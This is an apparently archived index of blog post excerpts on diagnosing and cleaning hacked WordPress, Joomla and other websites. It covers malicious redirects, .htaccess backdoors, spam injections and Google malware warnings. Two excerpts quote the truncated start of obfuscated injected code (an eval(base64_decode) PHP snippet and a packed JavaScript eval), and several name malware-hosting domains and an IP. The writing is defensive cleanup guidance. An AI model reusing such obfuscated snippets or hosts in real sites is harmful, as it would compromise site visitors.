Redirects to costabrava.bee.pl or froling.bee.pl

2012-02-22T15:33:00.001-05:00

Seems like that has been an uptick in the number of sites I have seen lately with the redirects to costabrava.bee.pl or froling.bee.pl. Typically redirects to http:// froling . bee . pl/ (costabrava . bee . pl ) are done using a bit of obfuscated php code, looks something like this eval(base64_decode('Ul9BR0VOVCddOw0KaWYgKCR1YWcpIHs NCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0c

Malware hosted on 31.184.242.102/

2012-02-14T12:46:00.000-05:00

Update: 02/15/2012 In the hacks I am seeing now the code is similar to the code listed below but the domain has changed to http://31.184.242.103/s.php .103 not .102. This is pretty common with hacks, as soon as Google flags the domain as malicious the hackers move to a new domain, one that Google has not flagged yet. I am seeing this hack on a lot of WordPress sites currently. The hack

Malicious redirects in the .htaccess file are being re-written

2012-01-18T08:33:00.000-05:00

In most (if not all) "malicious redirect" .htaccess hacks I have seen recently site owners have found that after cleaning up the .htaccess file the malicious code is being added back to the file within 30 minutes. This is being done with "backdoor(s)" the hackers have placed on the site. So far these have alll been php files placed on the site by the hackers. Site owners have reported the

Latest WordPress hack?

2011-12-09T12:30:00.001-05:00

Malware hosted on adsa.fr.pn and holala02.in or Malware hosted on adsa.cn.pn and piz04.edu.tf or Malware hosted on adsa.co.at.pn and topddd14.in I am seeing a number of WordPress sites hacked with a script call to a "rogue" php file over the last couple of days. The hacks have all been fairly similar. The hacker places a "rogue" php file on the site that, in most cases, has

Malicious software hosted on nl.ai

2011-11-07T07:58:00.000-05:00

The nl.ai hack is widespread on WordPress sites currently. The hack consists of a block of malicious JavaScript being inserted (usually into the section) into php pages on the site. Checking a page with the File Viewer Tool will show the code in a page. The malicious code appears like this in a page. eval(function(p,a,c,k,e,d){e=function(c){return(c

Early detection of spam hacks on a web site.

2011-09-22T15:22:00.000-04:00

I read a post today from John Mueller (Google guy) which I think is a great idea so I thought I would pass it on in a bog post. The post was in response to a question, Why am I getting > 2000 counts of words like adobe and cs5 on my joomla site? on Google's Webmaster Tools help forum. Hopefully you have never had to deal with a spam hack on your site, but if you have you know they can have a

redirects to uniqtext.com

2011-09-17T12:25:00.000-04:00

I am starting to see a few posts on the forums with sites being hacked to redirect to the domain uniqtext.com. The redirects occur randomly so they can be hard to detect. So far they have all been WordPress and Joomla sites. In addition to the redirect there was spammy links/content being inserted in the pages of the sites. In the 5 sites I have looked at the redirect code has been located in the

Removing a malware warning Blogspot (Blogger) site

2011-08-26T12:54:00.017-04:00

This question comes up fairly regularly on some of the forums where I participate. Suddenly Chrome or Firefox or Safari is blocking access to my blog with a reported attack sites page, has my blog been hacked? The answer is a very ambiguous "not exactly". The first thing you need to do is check the Safe Browsing Diagnostic Page for your site at http://www.google.com/safebrowsing/diagnostic?

Malicious software is hosted on newportalse.com, counter-wordpress.com, ?.us.to/kwizhveo.php

2011-08-22T09:50:00.028-04:00

newportalse.com, counter-wordpress.com There are currently a large number of Wordpress sites that have been hacked where the domain being listed on the warning page is newportalse.com. In most cases the first indicator of this hack has been when the site owner is notified by a user that they have gotten a warning when visiting the site and/or the site owner gets a warning when viewing one of

polko.cx.cc, dalanaya.cz.cc, holot.cx.cc kulop.cx.cc, kutol.cx.cc and all the other .(cx|cz).cc(s)

2011-06-27T22:53:00.006-04:00

It seems the latest virus that is going around is a JavaScript hack using .cx.cc and .cz.cc domains to host the malware. polko.cx.cc/, dalanaya.cz.cc/, holot.cx.cc/ kulop.cx.cc/, kutol.cx.cc/, adrieath.cx.cc/ carolinsoll.cz.cc/ are the most common domains being used currently. These domains will undoubtedly change over time and I will try to keep this list up to-date. If the diagnostic page or

Cleaning up the alienego.com hack

2011-06-16T14:30:00.004-04:00

It seems like there have been a rash of sites getting flagged for the alienego.com hack lately. The alienego is obfuscated JavaScript hack that is hitting all types of sites. If the diagnostic page for your site or the browser warning screen indicates Malicious software is hosted on 1 domain(s), including alienego.com/. Here are a couple of things to look for. Typically with alienego.com the

Cleaning up the try_pick_colors redef_colors malware.

2011-06-01T08:56:00.007-04:00

I have seen an up-tick in the number of sites hacked with the "try pick colors" (aka redef_colors) hack in the last few weeks. While this hack has mostly been associated with osCommerce sites, recently the hack has been showing up on increasing numbers of Wordpress and Joomla sites. The hack can, and does show up on virtually any type of site. The first part of the hack is some obfuscated

Cleaning up the imgaaa.net (or imgbbb or imgccc or imgddd.net) hack

2011-05-16T16:45:00.006-04:00

First, In all the img???.net hacks I have seen so far the hackers have gained access to the sites via stolen FTP credentials from a compromised PC. Do a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, use a couple of different security packages. Change ALL passwords especially FTP. Never store/save your passwords in your FTP client, use secure FTP if

So just who is a hackers best friend? (just ranting)

2011-05-15T17:44:00.004-04:00

OK guys I am frustrated today and while I would advise that you should never ever post anything when frustrated I am going against my own advice. So this is going to be nothing more than a rant and if I were you I would not bothering reading it. So who is a hackers best friend? After several years of looking at many 1000s of hacked websites I have come to the conclusion that without a doubt a

Using Xenu Link SleuthTM to find malicious code on your site.

2011-05-14T15:56:00.001-04:00

I saw a post this morning over on the Badwarebusters.org forum from a poster who was assisting a website owner in clearing a imgbbb.net hack. The post hi, Your problem is the same to me, I look for links to imgbbb.net on the infected site using xenulink ( http://home.snafu.de/tilman/xenulink.html ). by bk27info and thought now that sounds interesting lets give it a try. I went to the site

Spam Hacks, The Pharmacy Hack, The Porn Hack, etc.

2011-02-27T19:31:00.024-05:00

The pharmacy hack remains one of the most common posts we see on the Google Webmaster Tools Forum. The posts' start out with one of the following questions, "Why has my site suddenly dropped from page 1 of Google search results to page 863?" or "Why is Google reporting my most common keyword is viagra or cialis, I can not find those terms anywhere on my site? A search using the site: operator

Google Malware Warning False Positive?

2011-01-17T15:00:00.009-05:00

If you are reading this article you are probably one of the rare readers who arrived on this blog from a search results page and I am afraid you are not going to like what I have to say on the topic, but I hope you will take the time to read through what I have to say. I spend a fair amount of time hanging out on Google's Webmaster Tools Forum, the Malware and Hacked sites category and on the

Google says my site is redirecting to a malicious site, but it seems to work fine? Conditional hacks

2011-01-13T16:33:00.023-05:00

When a site has been flagged by Google it is all too common for site owners to see this message in the malware section of their Webmaster Tools Account, "When Google last tested this page, no content was returned from your server. Instead, the browser was redirected to a malicious web page. It is likely that your server configuration has been modified." However, when the site owner navigates to

How do I check .htaccess for malware

2010-12-12T22:38:00.024-05:00

* The .htaccess is an Apache (Apache like) web server system file. If you are hosted on an IIS server stop reading you will not have a .htaccess file on your site. The .htaccess file is an Apache system file which provides a way to make configuration changes on a per-directory basis. The .htaccess file is not a "required" file and may not be present at all on your site. There can be multiple

This site may be compromised

2010-12-12T14:51:00.015-05:00

While checking your site's performance in the search results you are shocked to see the notice This site may be compromised. below the link to your homepage. Jeeez Google what now?? The warning This site may be compromised from Google is relatively new and has just begun to show up on search results pages. Google has explained, "when we are indexing the pages of a site and we

Google's Safe Browsing Diagnostic page

2010-12-12T09:46:00.023-05:00

Well, *&#@ visitors to my site are getting the red screen of death and Google is advising that I check the Safe Browsing Diagnostic page for my site. OK I have checked it, what the heck does it mean? What can I learn from the page and how is it going to help me in clearing my site? Google's Safe Browsing Diagnostic page for any site can be accessed at http://www.google.com/safebrowsing/

Why has Google suddenly flagged my site (I haven't change anything in 10 years)

2010-12-11T14:44:00.013-05:00

So, your site/blog has been published for years, you have not changed anything, posted anything in months and all of the sudden your visitors have started getting warnings? It has to be a mistake, a False Positive, right? Chances are it is not! In this post we will discuss a couple of scenarios where you have not changed anything yet your site is serving malware. The first thing to check is

"Aw Snap" My website has been hacked! Now what? A few tips from redleg.